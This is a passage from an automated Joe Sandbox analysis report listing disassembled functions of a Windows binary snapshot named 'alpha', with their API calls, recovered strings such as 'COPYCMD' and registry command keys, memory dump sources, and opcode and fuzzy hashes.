                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                        • API String ID: 3260997497-2010427443
                                                                                                                                                                        • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                                                                        • Instruction ID: e429f694a15b71cba3f8e477f41b00a633eee9f726c2a2a7781bcec406003a63
                                                                                                                                                                        • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                                                                        • Instruction Fuzzy Hash: 10D18823A08682C2EB249F7598447BD62A1FF85B94F048231DA1DC77D5DF3EE849C74A
                                                                                                                                                                        Function 00007FF6E9437FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                        • String ID: @P
                                                                                                                                                                        • API String ID: 1801357106-3670739982
                                                                                                                                                                        • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                        • Instruction ID: 2224205e8b6eab4c055c87ffff21cf22ec9d6fdf2169e38779ea6eb208106058
                                                                                                                                                                        • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                        • Instruction Fuzzy Hash: C2413733B04A46DAE7108F70D4443EDABA0FB89758F848231EA1E92A88DF79D509CB45
                                                                                                                                                                        Function 00007FF6E9422220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1034426908-0
                                                                                                                                                                        • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                                                                        • Instruction ID: 6352f823e990107aaa31b8c739dd4f50514c4595b1341ae2f00a397b0a20a08d
                                                                                                                                                                        • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF19D33A08782CAEB68CF2198403E977A4FF45788F408131DA4ECB695DF3AE559C706
                                                                                                                                                                        Function 00007FF6E944AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                        • API String ID: 4081037667-3301834661
                                                                                                                                                                        • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                        • Instruction ID: b15d6751c3c2fda5eb23b50df203dc74cdcdb0a35f2b075443831fdac21ed0e4
                                                                                                                                                                        • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                        • Instruction Fuzzy Hash: BE71E463B09752E2EB608F65A4503BAA2E1FF84B80F944131DE4E87784DF3ED44ACB05
                                                                                                                                                                        Function 00007FF6E944AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944AA85
                                                                                                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944AACF
                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944AAEC
                                                                                                                                                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944AB39
                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944AB6F
                                                                                                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944ABA4
                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6E94498C0), ref: 00007FF6E944ABCB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                        • String ID: %s=%s
                                                                                                                                                                        • API String ID: 1019019434-1087296587
                                                                                                                                                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                        • Instruction ID: 7890272d6bcc28213ee2279f1330d0fae5e3ca86d2fa08ead230e6cda9d9ac73
                                                                                                                                                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 31517D72B08792D6E7608F65A4447AA7AE5FF89B80F408234CE4DC3795DF3AD44ACB05
                                                                                                                                                                        Function 00007FF6E9421884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: COPYCMD
                                                                                                                                                                        • API String ID: 2429825313-3727491224
                                                                                                                                                                        • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                        • Instruction ID: d5a9d37e105f7c90690e0b54320daf5bb12870769491aa56ee96e486eacf7285
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                        • Instruction Fuzzy Hash: 04F180B3E08652CAFB609F5190403BD27A1BF08798F004235DE5DE76D4EE3EA959C74A
                                                                                                                                                                        Function 00007FF6E9424A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4289998964-0
                                                                                                                                                                        • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                                                                        • Instruction ID: aea2176294c8184b32c8ddc1a5dbc9b37b21f15068a6f6a9a6930bcfd8d31d2d
                                                                                                                                                                        • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 85C1A063B0935AC2EA949F52955837D67A0FF45B90F005531CE0E877D0EF3EA4AAC70A
                                                                                                                                                                        Function 00007FF6E944BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3476366620-0
                                                                                                                                                                        • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                        • Instruction ID: 96ca7c358bc35f4b98d3d06d5492d593ee03f2117d47c28eda60fc6358b9a954
                                                                                                                                                                        • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                        • Instruction Fuzzy Hash: AE212F62918A42C6FB14AF60A8193BC6750FF4A715F845275D91EC22E1DF3EA40DC70A
                                                                                                                                                                        Function 00007FF6E9423D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                        • Instruction ID: 5de523657d9d39235c7ccb5d27c298c0ac1b0d665695a56d3b5033985c4b3d11
                                                                                                                                                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                        • Instruction Fuzzy Hash: 94515CB3A18642CAE700CF61A8406A83BB4FF44754F404635DA6DD77A5DF7EA548CB0A
                                                                                                                                                                        Function 00007FF6E9428DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                        • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                                                                        • Instruction ID: ba622db1215e1c42a1c9a96a81c36993a4d420ceb78f70a3db98c4c476fa9725
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CC1CB23A09686C6EB64CF21A954BFD23A4FF94B88F054531DA0DC7B91DF3AE548C306
                                                                                                                                                                        Function 00007FF6E9429B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                        • Instruction ID: 196384e80c03512715f8046446fb692c4e39210bb60e0eb83bc377972af5c520
                                                                                                                                                                        • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AA1B123A28642C6EB54DF26A45577967E0FF88B80F504135DE4EC7791EE3EE409C70A
                                                                                                                                                                        Function 00007FF6E944FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$DiskFreeSpace
                                                                                                                                                                        • String ID: %5lu
                                                                                                                                                                        • API String ID: 2448137811-2100233843
                                                                                                                                                                        • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                                                                        • Instruction ID: 6d3826518709258ceabc9986158cac8db56d3c8b7ec659a2cf81a5832b6a1b01
                                                                                                                                                                        • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E418B63608AC2C5EB61DF61E8447EA6360FF84788F408032EA4D8BB48DF7DD14ACB05
                                                                                                                                                                        Function 00007FF6E942D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction ID: f184d66e61f572ce9ea4a638f1b849d773b83185327a965e805fffd4258319ee
                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E717763E0C686C5FB64AF64A84837A22E0BF11754F544539D90EC76E1EF3EA48DC34A
                                                                                                                                                                        Function 00007FF6E94281D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1497570035-0
                                                                                                                                                                        • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                        • Instruction ID: 9df6d3c1c8ece93a02338c264648b72fb9ddde2b9aeebd305e6e074254e51622
                                                                                                                                                                        • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                                                                                                        • Instruction Fuzzy Hash: 09C10563A18642C2EB54DF22A4543BD67A0FF84784F044135EA5EC77D5EE3EE448C70A
                                                                                                                                                                        Function 00007FF6E9447B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
